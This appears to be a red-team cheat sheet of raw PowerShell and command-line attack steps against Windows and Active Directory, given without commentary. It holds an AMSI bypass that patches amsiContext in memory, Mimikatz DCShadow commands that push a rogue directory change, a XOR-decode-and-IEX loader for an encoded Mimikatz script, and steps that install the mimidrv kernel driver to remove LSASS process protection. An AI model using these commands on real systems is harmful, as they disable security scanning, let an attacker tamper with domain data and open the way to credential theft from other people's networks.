$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

Invoke-Mimikatz -Command '"!+" "!processtoken" "lsadump::dcshadow /object=<<username>> /attribute=description /value="DCShadow1"'
Invoke-Mimikatz -Command '"lsadump::dcshadow /push"'

$bytes = [System.IO.File]:: ReadAllBytes("c:\workspace\Invoke-Mimikatz.2.2.0.b64"); [Byte[]] $key = 0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,0x29,0x30; for($i=0; $i -lt $bytes.Length; $i++){$bytes[$i] = $bytes[$i] -bxor $key[$i%10]}; [System.Text.Encoding]::ASCII.GetString($bytes) | IEX

sc create mimidrv binPath= C:\workspace\mimidrv.sys type= kernel start= demand
sc start mimidrv
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
